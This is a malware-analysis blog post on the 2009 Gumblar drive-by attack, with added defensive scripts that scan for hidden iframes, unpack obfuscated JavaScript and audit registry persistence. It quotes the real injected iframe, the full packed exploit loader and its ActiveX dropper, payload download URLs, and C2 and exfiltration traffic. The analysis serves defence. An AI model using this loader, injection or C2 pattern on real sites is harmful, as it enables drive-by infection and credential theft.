Thursday, June 11, 2009

Gumblar Analysis

So it seems Gumblar is the latest threat to receive continual media hype. It was nice to see Symantec's opinion that this is just another day in the life of the web. Recent "threats" like Conficker and Gumblar seem to benefit security vendors and consultants who feed the hype for business purposes. Gumblar is an adopted name for a recent web-based drive-by attack, which follows the standard web-based drive-by attack TTP:

  1. The bad guys use stolen FTP credentials or SQL injection to inject iframe redirects into legitimate websites.
  2. The iframes redirect to sites that host exploit code targeted against web browsers, browser plug-ins and third-party applications (IE, FF, Adobe Reader, WinZip, etc.).
  3. The exploits result in a malware payload. The malware typically downloads additional for-profit malware (spambots, infostealers, rogue security products, etc.).
  4. Credentials exfiltrated by infostealers (such as FTP credentials) are used to compromise additional web servers, back in step #1.

At one point in the attack (~May 2009), the Gumblar exploit site was gumblar.cn (hence the adopted name). The domain martuz.cn was later used. The activity began much further back, but the attack summary was put together and publicized more recently. The following "Gumblar" analysis goes back to April 17, 2009, before gumblar.cn was utilized.

Gumblar Exploit Analysis

The USDA Forest Service website (http://www.fs.fed.us) was a victim of an iframe injection. The compromised site contained an iframe to lotmachinesguide.cn (94.247.3.150, Latvia):

<iframe src="http://lotmachinesguide.cn/in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>

The lotmachinesguide.cn/in.cgi?income56 request returned an HTTP Location redirect to liteautogreatest.cn (94.247.3.151, Latvia). The http://liteautogreatest.cn/index.php request returned obfuscated JavaScript and references to Adobe Reader and Flash files that contain exploit code:

http://liteautogreatest.cn/cache/readme.pdf
http://liteautogreatest.cn/cache/flash.swf
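
The injected tag above is the pattern site owners can check their own pages for: a frame with tiny dimensions or a hiding style whose source is on a foreign host. The following JavaScript (Node) is an added example, not code from the original post; it scans a raw HTML body for such frames. The sample body is constructed (it reuses the tag quoted above plus two benign frames), and the function names are my own.

```javascript
// Added example (not from the original post): flag injected hidden iframes
// in a raw HTML body. Regex-based so it runs on page bodies pulled from a
// crawler or proxy log without needing a DOM.

const IFRAME_RE = /<iframe\b([^>]*)>/gi;
const ATTR_RE = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;

// Parse one tag's attribute text into a lowercase-keyed object.
function parseAttrs(attrText) {
  const attrs = {};
  let m;
  ATTR_RE.lastIndex = 0;
  while ((m = ATTR_RE.exec(attrText)) !== null) {
    attrs[m[1].toLowerCase()] = (m[2] ?? m[3] ?? m[4] ?? '').trim();
  }
  return attrs;
}

// Reasons an iframe looks like a hidden injection (empty array = nothing notable).
function suspicionReasons(attrs, pageHost) {
  const reasons = [];
  const w = parseInt(attrs.width, 10);
  const h = parseInt(attrs.height, 10);
  if ((w >= 0 && w <= 2) || (h >= 0 && h <= 2)) reasons.push('tiny-dimensions');
  const style = (attrs.style || '').replace(/\s+/g, '').toLowerCase();
  if (/visibility:hidden|display:none/.test(style)) reasons.push('hidden-style');
  if (/(left|top):-\d{3,}px/.test(style)) reasons.push('offscreen');
  let srcHost = null;
  try {
    // Resolve relative sources against the scanned page's own host.
    srcHost = new URL(attrs.src || '', 'http://' + pageHost + '/').hostname;
  } catch (e) { /* unparsable src: treat as no host */ }
  if (srcHost && srcHost !== pageHost) reasons.push('external-host:' + srcHost);
  return reasons;
}

// Scan an HTML body for frames that both hide themselves and load a foreign host.
// Requiring both cuts false positives from legitimate hidden same-site frames.
function findHiddenIframes(html, pageHost) {
  const findings = [];
  let m;
  IFRAME_RE.lastIndex = 0;
  while ((m = IFRAME_RE.exec(html)) !== null) {
    const attrs = parseAttrs(m[1]);
    const reasons = suspicionReasons(attrs, pageHost);
    const hides = reasons.some(r => !r.startsWith('external-host:'));
    const external = reasons.some(r => r.startsWith('external-host:'));
    if (hides && external) findings.push({ src: attrs.src || '', reasons });
  }
  return findings;
}

// Constructed sample body: the injected tag from the post plus two benign frames.
const SAMPLE_HTML = `<html><body>
<iframe src="http://lotmachinesguide.cn/in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="/maps/embed" width=600 height=400></iframe>
<iframe src="https://www.example.org/video" width="560" height="315"></iframe>
</body></html>`;

console.log(JSON.stringify(findHiddenIframes(SAMPLE_HTML, 'www.fs.fed.us'), null, 2));
```

A same-host hidden frame alone does not alert, because legitimate sites use hidden frames for tracking and analytics; the rule needs both a hiding trick and a foreign source. Frames written at runtime by script (as the pdfswf() function on the exploit page does with document.write) are invisible to a static scan of the served body and need a headless browser that inspects the rendered DOM.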

The first two sections of the exploit code target the Microsoft Access Snapshot Viewer ActiveX Control vulnerability (CVE-2008-2463, MS08-041). The readme.pdf file contains code designed to exploit the Adobe util.printf overflow vulnerability (CVE-2008-2992, APSB08-19) and a vulnerability in the JavaScript method Collab.collectEmailInfo() in Adobe PDF Reader's JavaScript engine (CVE-2007-5659, APSB08-13). The flash.swf file exploits an Adobe Flash vulnerability (the specific one was not determined). The exploit payloads were GET requests to litehitscar.cn (94.247.3.151, Latvia) that returned load.exe:

http://litehitscar.cn/load.php?id=1
http://litehitscar.cn/load.php?id=4
http://litehitscar.cn/load.php?id=5

http://liteautogreatest.cn/index.php Code

<script>eval(function(l,a,z,k,e,d){e=function(z){return(z<a?'':e(parseInt(z/a)))+((z=z%a)>35?String.fromCharCode(z+29):z.toString(36))};while(z--){if(k[z]){l=l.replace(new RegExp('\\b'+e(z)+'\\b','g'),k[z])}}return l}('1h(1i(\'%E%J%l%o%h%k%p%l%0%V%l%E%10%h%L%B%E%w%1%2%d%c%I%d%c%g%E%p%9%1%j%P%D%9%11%j%M%P%w%0%t%0%15%F%0%z%q%s%A%A%G%w%D%H%0%t%0%x%x%u%0%j%P%D%9%11%j%M%P%w%0%1g%t%0%15%13%u%0%j%P%D%9%11%j%M%P%w%y%y%2%d%c%g%I%d%c%g%g%z%q%s%A%A%G%w%D%H%0%t%0%X%h%9%k%l%s%r%E%9%p%O%B%q%i%9%B%p%C%8%1%13%A%0%y%0%j%P%D%9%11%j%M%P%w%2%u%d%c%g%g%z%i%9%0%C%H%w%B%12%G%q%C%Z%0%t%0%l%8%L%0%19%O%i%s%8%1%2%u%d%c%g%g%C%H%w%B%12%G%q%C%Z%r%v%9%o%0%t%0%x%9%8%v%W%n%n%x%0%y%0%z%q%s%A%A%G%w%D%H%0%y%0%x%W%6%6%x%0%y%0%f%R%a%7%1%2%9%1%e%p%2%e%s%5%9%1%a%i%7%O%e%4%0%2%10%b%k%4%m%e%a%2%8%1%v%b%e%e%f%r%9%8%j%m%i%o%8%1%n%5%3%a%3%b%3%6%4%3%6%7%3%6%2%3%6%e%3%6%1%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%D%7%J%1%4%a%h%e%7%m%2%1%a%p%1%p%a%a%a%Y%a%2%0%7%5%a%1c%a%1%5%4%V%4%a%j%7%4%9%4%5%8%a%1%v%2%7%v%5%4%f%r%9%8%j%m%i%o%8%1%n%a%3%b%3%5%3%6%7%3%6%1%3%6%4%3%6%e%3%6%2%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%O%5%2%v%e%p%2%8%a%7%1%9%1%8%2%e%4%v%5%b%7%5%r%2%b%b%b%C%b%5%4%b%m%4%e%5%m%1%4%f%r%9%8%j%m%i%o%8%1%n%b%3%6%4%3%6%e%3%6%1%3%a%3%6%2%3%5%3%6%7%n%k%s%F%0%f%f%2%0%y%0%x%n%b%15%n%17%x%u%d%c%d%c%g%g%k%E%1%C%H%w%B%12%G%q%C%Z%r%q%8%k%s%q%h%0%t%t%0%A%1m%2%d%c%g%g%I%d%c%g%g%g%14%9%8%i%Y%u%d%c%g%g%K%d%c%d%c%g%g%C%H%w%B%12%G%q%C%Z%0%t%0%f%f%u%d%c%g%K%d%c%d%c%g%9%8%h%J%9%l%0%z%q%s%A%A%G%w%D%H%u%d%c%K%d%c%d%c%E%J%l%o%h%k%p%l%0%m%9%o%1a%O%M%N%1b%k%1%J%9%m%2%d%c%I%d%c%g%z%i%9%0%z%q%s%A%A%G%w%D%H%0%t%0%V%l%E%10%h%L%B%E%w%1%2%u%d%c%g%k%E%0%1%z%q%s%A%A%G%w%D%H%0%t%t%0%f%1f%f%2%0%9%8%h%J%9%l%u%d%c%d%c%g%h%9%M%d%c%g%I%d%c%g%g%z%i%9%0%j%N%B%U%T%S%Q%l%0%t%0%l%8%L%0%18%o%h%k%z%8%Z%D%14%1d%8%o%h%1%f%v%e%5%l%1%e%a%j%a%z%4%1%L%7%b%a%7%r%e%5%5%a%X%4%5%7%7%l%5%5%7%2%i%4%1%e%j%7%a%5%b%7%v%b%b%7%q%2%b%p%a%7%4%h%4%2%0%5%2%1l%7%1%4%5%k%4%a%8%5%5%L%7%8%a%4%7%9%1%4%1%7%0%a%7%e%2%B%4%a%p%2%l%7%b%4%e%h%4%b%9%7%5%4%p%4%m%5%2%4%r%5%b%7%5%17%a%b%2%f%r%
9%8%j%m%i%o%8%1%n%b%3%6%e%3%6%2%3%6%4%3%6%1%3%5%3%6%7%3%a%n%k%s%F%0%f%f%2%2%u%d%c%g%K%d%c%d%c%g%o%i%h%o%q%1%8%2%d%c%g%I%d%c%g%g%k%E%0%1%j%N%B%U%T%S%Q%l%0%4%t%0%f%1f%4%1%p%5%1%14%e%1%1d%5%5%8%2%5%2%o%b%h%4%7%5%1k%5%b%e%f%r%9%8%j%m%i%o%8%1%n%6%7%3%a%3%6%e%3%6%2%3%6%4%3%b%3%6%1%3%5%n%k%s%F%0%f%f%2%2%0%9%8%h%J%9%l%u%d%c%g%K%d%c%d%c%g%j%N%B%U%T%S%Q%l%r%X%l%i%j%v%q%p%h%R%i%h%q%0%t%0%J%9%m%u%d%c%d%c%g%h%9%M%d%c%g%I%d%c%g%g%j%N%B%U%T%S%Q%l%r%B%p%O%j%9%8%v%v%8%C%R%i%h%q%0%t%0%z%q%s%A%A%G%w%D%H%0%y%0%x%W%6%6%x%0%y%0%f%R%4%2%e%9%4%e%5%p%4%a%1%5%s%a%1%9%7%a%i%4%e%O%2%2%0%2%4%5%10%4%k%e%1%m%2%1%8%b%b%a%v%2%1%2%f%r%9%8%j%m%i%o%8%1%n%b%3%6%2%3%a%3%6%e%3%6%1%3%6%7%3%5%3%6%4%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%D%2%b%J%4%h%5%5%7%m%4%e%p%2%b%p%4%Y%5%e%2%0%5%1c%a%V%b%j%1%4%7%9%7%8%5%5%v%7%b%v%e%4%a%f%r%9%8%j%m%i%o%8%1%n%6%4%3%b%3%5%3%6%e%3%6%2%3%a%3%6%1%3%6%7%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%L%e%7%i%2%1%14%4%7%r%4%5%8%7%a%e%1%V%b%a%8%2%4%f%r%9%8%j%m%i%o%8%1%n%6%7%3%6%e%3%5%3%b%3%6%4%3%a%3%6%1%3%6%2%n%k%s%F%0%f%f%2%u%d%c%g%g%j%N%B%U%T%S%Q%l%r%R%9%k%l%h%X%l%i%j%v%q%p%h%1%2%u%d%c%g%K%d%c%d%c%g%o%i%h%o%q%1%8%2%I%K%u%d%c%d%c%g%z%i%9%0%8%Y%Q%R%z%k%m%13%18%1e%0%t%0%v%8%h%19%l%h%8%9%z%i%m%1%E%J%l%o%h%k%p%l%1%2%I%k%E%0%1%j%N%B%U%T%S%Q%l%r%9%8%i%C%M%X%h%i%h%8%0%t%t%0%w%2%0%I%o%m%8%i%9%19%l%h%8%9%z%i%m%1%8%Y%Q%R%z%k%m%13%18%1e%2%u%L%k%l%C%p%L%r%m%p%o%i%h%k%p%l%0%t%0%f%m%1%C%b%i%1%1%1%1%j%1%W%b%4%2%n%a%7%1%a%a%n%2%7%a%4%f%r%9%8%j%m%i%o%8%1%n%6%7%3%6%e%3%6%1%3%6%2%3%a%3%b%3%5%3%6%4%n%k%s%F%0%f%f%2%u%K%K%F%0%1j%16%16%16%2%u%d%c%K%d%c%d%c%m%9%o%1a%O%M%N%1b%k%1%f%q%b%2%h%2%5%a%5%h%b%j%4%W%e%7%e%n%2%e%2%n%1%e%m%a%7%k%1%h%4%b%8%7%q%1%k%2%2%h%2%5%v%5%1%o%2%5%4%b%4%i%5%9%7%1%7%r%b%o%1%7%1%l%e%1%n%4%4%m%b%e%p%7%b%7%i%b%7%4%4%e%C%b%r%7%7%j%4%5%4%q%1%b%j%2%a%b%5%2%1n%5%2%1%5%k%e%e%7%C%2%b%a%t%5%17%4%1%f%r%9%8%j%m%i%o%8%1%n%6%7%3%6%1%3%a%3%b%3%6%2%3%6%4%3%5%3%6%e%n%k%s%F%0%f%f%2%2%u\'));',62,86,'u0020|u0028|u0029|u007c|u0021|u0026|u005c|u005e|u0065|u0072|u0040|u0023|u000a|u000d|u0024|u0027|u0009|u0074|
u0061|u0070|u0069|u006e|u006c|u002f|u0063|u006f|u0068|u002e|u0067|u003d|u003b|u0073|u0034|u0022|u002b|u0076|u0035|u0043|u0064|u004f|u0066|u002c|u0052|u0051|u007b|u0075|u007d|u0077|u0079|u004a|u006d|u0048|u004e|u0050|u004c|u0042|u0059|u0078|u003a|u0053|u006b|u0058|u0046|u004b|u0057|u0036|u0062|u0032|u0030|u0031|u0041|u0049|u0037|u0044|u0045|u006a|u0055|u005b|u003c|eval|unescape|u0033|u005d|u0056|u0039|u003f'.split('|')))</script><html>

<body>
<script>
function pdfswf()
{
    PDF = new Array("AcroPDF.PDF", "PDF.PdfCtrl");
    for(i in PDF)
    {
        try
        {
            obj = new ActiveXObject(PDF[i]);
            if (obj)
            {
                document.write('<iframe src="cache/readme.pdf"></iframe>');
            }
        }
        catch(e){}
    }
    try
    {
        obj = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
        if (obj)
        {
            document.write('<iframe src="cache/flash.swf"></iframe>');
        }
    }
    catch(e){}
}
pdfswf();
</script>
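
The packed script above is the common eval(function(p,a,c,k,e,d){...}) packer: each token in the payload is a base-62 index into the trailing word table, and the function body substitutes the words back before eval runs the result. The following JavaScript (Node) is an added example, not code from the original post or from the attackers' page; it re-implements that substitution statically so the decoded source can be read without executing it, and it also peels the eval(unescape('%uXXXX...')) wrapper that this sample's first layer produces (the payload starts 1h(1i(, and 1h and 1i are the base-62 tokens for eval and unescape, entries 79 and 80 of the 86-word table). The packed sample inside the block is constructed; the names encodeIndex, unpack, extractPackerArgs, decodePercentU and peelLayers are my own.

```javascript
// Added example (not from the original post or the attackers' page):
// static unpacker for the eval(function(p,a,c,k,e,d){...}) packer.

// Encode a word index the way the packer's e() does: base-`radix` digits,
// 0-9a-z for digit values below 36 and A-Z for 36..61.
function encodeIndex(z, radix) {
  const digit = z % radix;
  const head = z < radix ? '' : encodeIndex(Math.floor(z / radix), radix);
  return head + (digit > 35 ? String.fromCharCode(digit + 29) : digit.toString(36));
}

// Reverse the substitution: walk the word table from the highest index down and
// replace each encoded token (at word boundaries) with its word. This is the
// packer's own loop, but the result is returned instead of being passed to eval.
function unpack(payload, radix, count, words) {
  let out = payload;
  for (let z = count - 1; z >= 0; z--) {
    if (words[z]) {
      out = out.replace(new RegExp('\\b' + encodeIndex(z, radix) + '\\b', 'g'), words[z]);
    }
  }
  return out;
}

// Pull (p, a, c, k) out of the trailing ...}('p',a,c,'k'.split('|')) call.
// Only the packer's fixed argument shape is accepted; anything else yields null.
const PACKER_ARGS_RE = /\}\('((?:[^'\\]|\\.)*)',(\d+),(\d+),'((?:[^'\\]|\\.)*)'\.split\('\|'\)/;
function extractPackerArgs(script) {
  const m = PACKER_ARGS_RE.exec(script);
  if (!m) return null;
  return {
    payload: m[1].replace(/\\'/g, "'"),
    radix: Number(m[2]),
    count: Number(m[3]),
    words: m[4].split('|'),
  };
}

// Decode %uXXXX and %XX sequences the way unescape() would, without running anything.
function decodePercentU(s) {
  return s
    .replace(/%u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Peel wrappers until no known one remains: packer layers, then the
// eval(unescape('...')) wrapper the post's sample produces after one pass.
const EVAL_UNESCAPE_RE = /^\s*eval\(unescape\('((?:[^'\\]|\\.)*)'\)\)\s*;?\s*$/;
function peelLayers(script, maxLayers = 5) {
  let cur = script;
  const layers = [];
  for (let i = 0; i < maxLayers; i++) {
    const args = extractPackerArgs(cur);
    if (args) {
      cur = unpack(args.payload, args.radix, args.count, args.words);
      layers.push('packer');
      continue;
    }
    const m = EVAL_UNESCAPE_RE.exec(cur);
    if (m) {
      cur = decodePercentU(m[1]);
      layers.push('eval-unescape');
      continue;
    }
    break;
  }
  return { source: cur, layers };
}

// Constructed two-layer sample mirroring the post's structure: a packer whose
// payload is eval(unescape('...')); the inner text decodes to a harmless alert(1).
const SAMPLE_PACKED = "eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c])}}return p}('0(1(\\'%u0061%u006c%u0065%u0072%u0074%u0028%u0031%u0029\\'))',62,2,'eval|unescape'.split('|')))";

console.log(JSON.stringify(peelLayers(SAMPLE_PACKED)));
```

On the post's sample, one pass turns 1h(1i('%E%J...')) into eval(unescape('%u0066%u0075...')), so the second pass is what makes the ActiveX and PDF/Flash sections the text describes readable. Because the word-boundary replacement is the packer's own semantics, the output is exactly what eval would have received, and nothing from the sample is executed along the way.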

Malware Analysis

http://litehitscar.cn/load.php?id=5 (load.exe)

The request for load.php returns the binary file load.exe.

File: load.exe
Size: 18432
MD5: 4C328C15F6E8603F713FDACF7DAC6E87

The malware dropper load.exe creates C:\WINDOWS\system32\digiwet.dll and modifies a registry key to launch the malware at startup.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders "SecurityProviders"
Old type: REG_SZ
New type: REG_SZ
Old data: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll
New data: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll

The digiwet.dll malware is the core “Gumblar” bot. The malware initiates connections to the bot controller at 78.109.29.112 (Ukraine) and downloads 259043 bytes of data which includes additional malware. Additional C2 connections to 78.109.30.224 (Ukraine) were observed.

GET /new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=3970894049&rnd=981633 HTTP/1.1
Host: 78.109.29.112

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 17 Apr 2009 00:06:05 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Version: 1
Content-Length: 259043
Entity-Info: 1239013921:32768:1;1239013932:41984:1;1239013964:84480:2;1239022982:33792:2;1239024633:45568:2;1239875139:20451:2;

Rnd: 982306

Magic-Number: 256|1|40:21:222:188:141:149:35:113:122:238:96:131:88:202:90:82:137:127:146:127:209:5:235:94:57:25:53:42:127:239:54:168:4:21:100:145:170:136:3:37:118:100:168:206:47:2:33:184:129:179:55:83:185:35:177:242:60:231:29:188:214:84:100:218:105:201:108:19:81:112:57:199:212:225:150:3:228:183:188:102:107:243:186:36:23:108:23:83:83:52:16:41:136:116:4:241:62:112:5:143:225:62:87:182:32:238:186:5:166:118:107:17:106:38:54:129:146:77:213:229:129:229:14:10:90:19:251:152:132:1:40:101:64:128:27:97:111:213:102:21:75:210:39:181:248:93:55:138:170:12:112:44:242:127:54:77:146:50:229:22:51:14:123:115:143:151:213:254:108:59:20:184:14:59:110:6:152:165:145:67:178:1:111:164:128:165:241:19:215:215:41:11:230:164:126:117:60:84:116:168:143:136:97:157:195:207:164:92:117:54:159:39:55:14:204:184:180:189:203:139:149:245:150:124:154:21:241:214:105:102:127:249:238:224:151:178:176:59:14:37:113:173:77:169:187:25:98:112:215:46:251:108:35:146:233:189:

eON...#q~.`..5ZR1......^y.5*..6...d....%vd../.!...7S.#..

************************************************************************

GET /new/controller.php?action=report&guid=0&rnd=981633&uid=1&entity=1239013921:unique_start;1239013932:unique_start;1239013964:unique_start;1239022982:unique_start;1239024633:unique_start;1239875139:unique_start HTTP/1.1
Host: 78.109.29.112


************************************************************************

POST /good/receiver/online HTTP/1.1
Host: 78.109.30.224
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

guid=397089404

************************************************************************

The downloaded data creates 4 temp files:

C:\WINDOWS\Temp\wpv451239013964.exe
C:\WINDOWS\Temp\wpv211239022982.exe
C:\WINDOWS\Temp\wpv781239024633.exe
C:\WINDOWS\Temp\wpv941239875139.exe

wpv451239013964.exe (Downloader)
The Temp file wpv451239013964.exe creates a trojan downloader. The malware creates:

C:\WINDOWS\system32\crypts.dll

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "Asynchronous"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "DLLName"
Type: REG_SZ
Data: crypts.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "Impersonate"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "StartShell"
Type: REG_SZ
Data: Run
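
Both persistence mechanisms seen so far (digiwet.dll appended to the SecurityProviders list under Malware Analysis, and crypts.dll registered as a Winlogon notification package here) leave a deterministic trace that can be diffed against a known-good baseline. The following JavaScript (Node) is an added example, not code from the original post; it parses a reg-export style text and reports SecurityProviders entries outside the post's "Old data" list and Winlogon\Notify subkeys whose DLLName is not in a baseline. The reg text is constructed from the keys listed in the post plus one legitimate subkey (cryptnet), the Winlogon\Notify baseline is my assumption for a default Windows XP build, and the function names are my own.

```javascript
// Added example (not from the original post): audit a registry export for the
// two persistence tricks described in the post.

// Parse reg-export style text into { keyPathLower: { valueNameLower: value } }.
// String values are unquoted, dword values become numbers, others stay raw.
function parseRegExport(text) {
  const keys = {};
  let current = null;
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line.startsWith('Windows Registry Editor')) continue;
    const keyMatch = /^\[(.+)\]$/.exec(line);
    if (keyMatch) {
      current = keyMatch[1].toLowerCase();
      keys[current] = keys[current] || {};
      continue;
    }
    const valMatch = /^"((?:[^"\\]|\\.)*)"=(.*)$/.exec(line);
    if (!valMatch || current === null) continue;
    let value = valMatch[2];
    if (value.startsWith('"') && value.endsWith('"')) {
      value = value.slice(1, -1).replace(/\\(.)/g, '$1');
    } else if (value.startsWith('dword:')) {
      value = parseInt(value.slice(6), 16);
    }
    keys[current][valMatch[1].toLowerCase()] = value;
  }
  return keys;
}

const SECURITY_PROVIDERS_KEY = 'hkey_local_machine\\system\\currentcontrolset\\control\\securityproviders';
const NOTIFY_PREFIX = 'hkey_local_machine\\software\\microsoft\\windows nt\\currentversion\\winlogon\\notify\\';

// Baseline taken from the post's "Old data" for the SecurityProviders value.
const KNOWN_SECURITY_PROVIDERS = new Set(['msapsspc.dll', 'schannel.dll', 'digest.dll', 'msnsspc.dll']);
// Assumed known-good Winlogon\Notify DLLs for a default Windows XP build;
// derive your own baseline from a clean image of the build you run.
const KNOWN_NOTIFY_DLLS = new Set(['crypt32.dll', 'cryptnet.dll', 'cscdll.dll', 'wlnotify.dll', 'sclgntfy.dll']);

// Any provider DLL outside the baseline is reported (digiwet.dll in the post).
function auditSecurityProviders(reg) {
  const values = reg[SECURITY_PROVIDERS_KEY] || {};
  const list = String(values.securityproviders || '')
    .split(',').map(s => s.trim().toLowerCase()).filter(Boolean);
  return list.filter(dll => !KNOWN_SECURITY_PROVIDERS.has(dll))
             .map(dll => ({ check: 'SecurityProviders', dll }));
}

// Any Notify subkey whose DLLName is outside the baseline is reported (crypts.dll in the post).
function auditWinlogonNotify(reg) {
  const findings = [];
  for (const key of Object.keys(reg)) {
    if (!key.startsWith(NOTIFY_PREFIX)) continue;
    const dll = String(reg[key].dllname || '').toLowerCase();
    if (!KNOWN_NOTIFY_DLLS.has(dll)) {
      findings.push({ check: 'WinlogonNotify', subkey: key.slice(NOTIFY_PREFIX.length), dll });
    }
  }
  return findings;
}

function auditPersistence(regText) {
  const reg = parseRegExport(regText);
  return [...auditSecurityProviders(reg), ...auditWinlogonNotify(reg)];
}

// Constructed export reproducing the post's keys plus one legitimate Notify subkey (assumed).
const SAMPLE_REG = String.raw`Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders]
"SecurityProviders"="msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt]
"Asynchronous"=dword:00000001
"DLLName"="crypts.dll"
"Impersonate"=dword:00000001
"StartShell"="Run"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptnet]
"DLLName"="cryptnet.dll"
`;

console.log(JSON.stringify(auditPersistence(SAMPLE_REG), null, 2));
```

The subkey name "crypt" is chosen to sit next to the legitimate crypt32chain and cryptnet entries, which is why the check keys on the DLLName value rather than on the subkey name. Feed it the output of a registry export from the host (or from an offline hive via a forensic tool) and pair the findings with the file hashes listed at the end of the post.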

The malware connects to af9f440dcc.com (83.133.127.5, Germany) to receive instructions for additional malware downloads. The connection below returns instructions to download malware from spaeioer.com (68.180.151.74, US):

GET /bt.php?mod=&id=computername_-324073247&up=2667859&mid=soboc43 HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: af9f440dcc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Transfer-Encoding: chunked
X-Powered-By: PHP/5.2.6
Content-type: text/html
Date: Fri, 17 Apr 2009 00:42:08 GMT
Server: lighttpd/1.4.19


0SLP:3600;MOD:dAjvlbv5;URL:http://spaeioer.com/741l3.exe;SRV:stoped;

************************************************************************

GET /741l3.exe HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: spaeioer.com
Connection: Keep-Alive


************************************************************************

wpv211239022982.exe (Gozi)
The Temp file wpv211239022982.exe creates a Gozi variant. The malware monitors web connections and serves as an infostealer. The Temp file wpv211239022982.exe creates:

C:\WINDOWS\9129837.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ttool = "%Windir%\9129837.exe"

The file 9129837.exe creates:

C:\WINDOWS\new_drv.sys

HKEY_CURRENT_USER\Software\Microsoft\InetData "Data"
Type: REG_BINARY
Data: 28, 00, 00, 00, 00, A5, 01, DB, 00, 00, F1, 0C, 65, 30
HKEY_CURRENT_USER\Software\Microsoft\InetData "k1"
Type: REG_DWORD
Data: 15, AB, 0A, 85
HKEY_CURRENT_USER\Software\Microsoft\InetData "k2"
Type: REG_DWORD
Data: 91, CC, B1, 44
HKEY_CURRENT_USER\Software\Microsoft\InetData "version"
Type: REG_SZ
Data: 16


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "DisplayName"
Type: REG_SZ
Data: !!!!
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ErrorControl"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ImagePath"
Type: REG_EXPAND_SZ
Data: \??\C:\WINDOWS\new_drv.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Start"
Type: REG_DWORD
Data: 03, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Type"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_NEW_DRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Security "Security"
Type: REG_BINARY
Data: [binary data]

The following services are stopped:

Application Layer Gateway Service
Windows Firewall/Internet Connection Sharing (ICS)
Security Center

The Gozi malware connects to 91.207.61.44 (Ukraine) and 212.117.165.54 (Luxembourg) for C2 and data exfiltration.

POST /cgi-bin/ppp.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------28c6e728c6e728c6e7
User-Agent: IE
Host: 91.207.61.44
Content-Length: 231
Cache-Control: no-cache


----------------------------28c6e728c6e728c6e7

Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream
Forms:

----------------------------28c6e728c6e728c6e7--


************************************************************************

GET /cgi-bin/commm.cgi?user_id=2232068885&version_id=16&passphrase=fkjvhsdvlksdhvlsd&socks=2149&version=125&crc=00000000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 91.207.61.44


************************************************************************

GET /cgi-bin/ooo.cgi?user_id=2232068885&version_id=16&passphrase=fkjvhsdvlksdhvlsd&socks=2149&version=125&crc=00000000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 91.207.61.44


************************************************************************

